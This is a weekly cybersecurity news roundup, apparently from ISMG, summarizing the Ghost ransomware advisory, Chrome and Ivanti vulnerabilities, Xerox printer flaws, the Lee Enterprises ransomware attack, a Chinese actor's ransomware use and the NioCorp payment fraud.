Breach Update: FBI Issues Warning on Ghost Threats

This week, ISMG provides a summary of notable cybersecurity incidents globally, highlighting an FBI warning regarding Ghost ransomware, Google addressing vulnerabilities, and Lee Enterprises confirming a ransomware incident. Additionally, a proof-of-concept was released for Ivanti EPM vulnerabilities, and a cyber flaw was identified in Xerox machines. Furthermore, a Chinese cyberespionage actor appears to have engaged in ransomware attacks, and NioCorp has fallen victim to a cyberheist.

See Also: Top 10 Technical Predictions for 2025

The FBI, alongside the U.S. Cybersecurity and Infrastructure Security Agency, has issued warnings about the Ghost ransomware, which has affected organizations across more than 70 countries, notably within the healthcare, government, education, and critical infrastructure sectors. This ransomware, operational since early 2021, exploits outdated vulnerabilities within Fortinet, ColdFusion, and Microsoft Exchange systems. The group, often referred to as Cring and Crypt3r, employs various malware variants and ransom practices to obfuscate their tracks, complicating attribution for authorities.

Initial infiltration methods include the use of established tools like Mimikatz and Cobalt Strike, with subsequent ransomware deployment executed via Windows CertUtil to avoid detection. The origins of the group, traced to China, mark a distinctive anomaly in the predominantly Russian-speaking landscape of ransomware operators.

Google has announced patches for two critical vulnerabilities in Chrome, identified as CVE-2025-0999 and CVE-2025-1426. These high-severity flaws could enable remote code execution and full system takeover due to heap buffer overflows affecting the V8 JavaScript engine and GPU components. A third medium-severity flaw, CVE-2025-1006, involves a use-after-free vulnerability potentially allowing arbitrary code execution. Google has provided fixes across all major operating systems.

Lee Enterprises, a significant U.S. newspaper chain, has publicly confirmed that a ransomware assault compromised operations at numerous publications. The media group, which oversees 350 newspapers across 25 states and ranks as the fourth largest newspaper entity in the country, initially described the event as a “cyber incident” on February 3. At least 75 newspapers encountered significant disruptions in printing, subscriptions, and internal services as a result of the attack.

Initial assessments indicate that the hackers encrypted critical applications and exfiltrated sensitive files. Although the company refrained from explicitly labeling the incident as ransomware, the attack displays classic ransomware characteristics. Gradual recovery efforts are underway, with key operations resuming by February 12. However, some weekly publications are still affected, accounting for an estimated 5% of revenue. The financial ramifications remain uncertain, but the company has cybersecurity insurance to cover incident response costs and investigations.

This week, Horizon.ai revealed a proof-of-concept exploiting four vulnerabilities within the Ivanti Endpoint Manager, which were patched by the company in January. These vulnerabilities, which include CVE-2024-10811, CVE-2024-13161, CVE-2024-13160, and CVE-2024-13159, could allow unauthorized attackers to exploit the Ivanti EPM machine account credentials, enabling relay attacks and potential server compromises. These vulnerabilities are primarily due to inadequate input sanitization within APIs tied to endpoint management, allowing for unauthorized function calls.

Two recently patched vulnerabilities in Xerox’s VersaLink C7025 printers could pose significant risks by facilitating attacks aimed at capturing Windows Active Directory credentials. Research by Rapid7 identified flaws tracked as CVE-2024-12510 and CVE-2024-12511 present in firmware prior to version 57.69.91. Attackers can exploit these vulnerabilities to reconfigure printers to relay authentication credentials to malicious servers. If such configurations include domain admin credentials, this could ultimately grant attackers full control over Windows environments, including databases and email systems.

The exploitation of these vulnerabilities requires only basic access methods, as many organizations fail to update default printer passwords. Xerox has released a firmware update to mitigate these risks.

Researchers at Symantec have discovered a cyber actor utilizing tools associated with Chinese nation-state espionage in a ransomware attack targeting a medium-sized software and services company in South Asia. The assessment suggests the attacker might be dual-hatting, utilizing resources from their primary employer for illicit gain.

According to the findings, the attacker infiltrated the target’s network via a Palo Alto Networks vulnerability tracked as CVE-2024-0012. The intruder deployed a variant of the PlugX malware typically observed in state-sponsored cyber operations. There are indications that this actor has engaged in ransomware activities for some time, leading researchers to dismiss the possibility that these attacks serve only as distractions from espionage efforts.

NioCorp Developments Ltd. has revealed a cybersecurity breach that resulted in $500,000 in misdirected vendor payments. The intrusion, which was detected last Friday, involved unauthorized access to the company’s email systems. NioCorp has subsequently informed financial institutions and law enforcement, although it has not provided clarity on the recovery of the misappropriated funds.

Additional Coverage from Last Week

Reporting contributed by Information Security Media Group’s Akshaya Asokan in Southern England, Prajeet Nair in Bengaluru, India, and David Perera in Washington, D.C.